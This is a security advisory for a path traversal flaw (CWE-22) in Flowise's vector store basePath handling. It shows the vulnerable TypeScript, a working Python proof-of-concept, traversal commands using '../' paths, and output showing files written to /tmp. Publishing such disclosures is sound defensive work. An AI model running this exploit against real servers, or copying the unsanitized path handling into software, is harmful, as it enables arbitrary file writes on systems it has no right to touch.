GHSA-w6v6-49gh-mc9w
Suggest an improvement- Source
- https://github.com/advisories/GHSA-w6v6-49gh-mc9w
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-w6v6-49gh-mc9w/GHSA-w6v6-49gh-mc9w.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-w6v6-49gh-mc9w
- Published
- 2026-04-16T21:22:49Z
- Modified
- 2026-04-16T21:34:04.786495Z
- Severity
-
- 4.9 (Medium) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:H/SA:N CVSS Calculator
- Summary
- Flowise: Path Traversal in Vector Store basePath
- Details
-
Summary
The Faiss and SimpleStore (LlamaIndex) vector store implementations accept a
basePathparameter from user-controlled input and pass it directly to filesystem write operations without any sanitization. An authenticated attacker can exploit this to write vector store data to arbitrary locations on the server filesystem.Vulnerability Details
| Field | Value | |-------|-------| | Affected File |
packages/components/nodes/vectorstores/Faiss/Faiss.ts(lines 79, 91) | | Affected File |packages/components/nodes/vectorstores/SimpleStore/SimpleStore.ts(lines 83-104) |Prerequisites
- Authentication: Valid API token with
documentStores:upsert-configpermission - Document Store: An existing Document Store with at least one processed chunk
- Embedding Credentials: Valid embedding provider credentials (e.g., OpenAI API key)
Root Cause
Faiss (
Faiss.ts)async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> { const basePath = nodeData.inputs?.basePath as string // User-controlled // ... const vectorStore = await FaissStore.fromDocuments(finalDocs, embeddings) await vectorStore.save(basePath) // Direct filesystem write, no validation }SimpleStore (
SimpleStore.ts)async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> { const basePath = nodeData.inputs?.basePath as string // User-controlled let filePath = '' if (!basePath) filePath = path.join(getUserHome(), '.flowise', 'llamaindex') else filePath = basePath // Used directly without sanitization const storageContext = await storageContextFromDefaults({ persistDir: filePath }) // Writes to arbitrary path }Impact
An authenticated attacker can:
- Write files to arbitrary locations on the server filesystem
- Overwrite existing files if the process has write permissions
- Potential for code execution by writing to web-accessible directories or startup scripts
- Data exfiltration by writing to network-mounted filesystems
Proof of Concept
poc.py
#!/usr/bin/env python3 """ POC: Path Traversal in Vector Store basePath (CWE-22) Usage: python poc.py --target http://localhost:3000 --token <API_KEY> --store-id <STORE_ID> --credential <EMBEDDING_CREDENTIAL_ID> """ import argparse import json import urllib.request import urllib.error def post_json(url, data, headers): req = urllib.request.Request( url, data=json.dumps(data).encode("utf-8"), headers={**headers, "Content-Type": "application/json"}, method="POST", ) with urllib.request.urlopen(req, timeout=120) as resp: return resp.status, resp.read().decode("utf-8", errors="replace") def main(): ap = argparse.ArgumentParser() ap.add_argument("--target", required=True) ap.add_argument("--token", required=True) ap.add_argument("--store-id", required=True) ap.add_argument("--credential", required=True) ap.add_argument("--base-path", default="/tmp/flowise-path-traversal-poc") args = ap.parse_args() payload = { "storeId": args.store_id, "vectorStoreName": "faiss", "vectorStoreConfig": {"basePath": args.base_path}, "embeddingName": "openAIEmbeddings", "embeddingConfig": {"credential": args.credential}, } url = args.target.rstrip("/") + "/api/v1/document-store/vectorstore/insert" headers = {"Authorization": f"Bearer {args.token}"} try: status, body = post_json(url, payload, headers) print(body) except urllib.error.HTTPError as e: print(e.read().decode()) if __name__ == "__main__": main()Setup
- Create a Document Store in Flowise UI
- Add a Document Loader (e.g., Plain Text) with any content
- Click "Process" to create chunks
- Note the Store ID from the URL
- Get your embedding credential ID from Settings → Credentials
Exploitation
# Write to /tmp python poc.py \ --target http://127.0.0.1:3000 \ --token <API_TOKEN> \ --store-id <STORE_ID> \ --credential <OPENAI_CREDENTIAL_ID> \ --base-path /tmp/flowise-pwned # Path traversal variant python poc.py \ --target http://127.0.0.1:3000 \ --token <API_TOKEN> \ --store-id <STORE_ID> \ --credential <OPENAI_CREDENTIAL_ID> \ --base-path "../../../../tmp/traversal-test"Evidence
$ python poc.py --target http://127.0.0.1:3000/ --token <TOKEN> --store-id 30af9716-ea51-47e6-af67-5a759a835100 --credential bb1baf6e-acb7-4ea0-b167-59a09a28108f --base-path /tmp/flowise-pwned {"numAdded":1,"addedDocs":[{"pageContent":"Lorem Ipsum","metadata":{"docId":"d84d9581-0778-454d-984e-42b372b1b555"}}],"totalChars":0,"totalChunks":0,"whereUsed":[]} $ ls -la /tmp/flowise-pwned/ total 16 drwxr-xr-x 4 user wheel 128 Jan 17 12:00 . drwxrwxrwt 12 root wheel 384 Jan 17 12:00 .. -rw-r--r-- 1 user wheel 1234 Jan 17 12:00 docstore.json -rw-r--r-- 1 user wheel 5678 Jan 17 12:00 faiss.index - Authentication: Valid API token with
- Database specific
{ "github_reviewed": true, "github_reviewed_at": "2026-04-16T21:22:49Z", "cwe_ids": [ "CWE-22" ], "severity": "MODERATE", "nvd_published_at": null }- References
Affected packages
npm / flowise
Package
- Name
- flowise
- View open source insights on deps.dev
- Purl
- pkg:npm/flowise
npm / flowise-components
Package
- Name
- flowise-components
- View open source insights on deps.dev
- Purl
- pkg:npm/flowise-components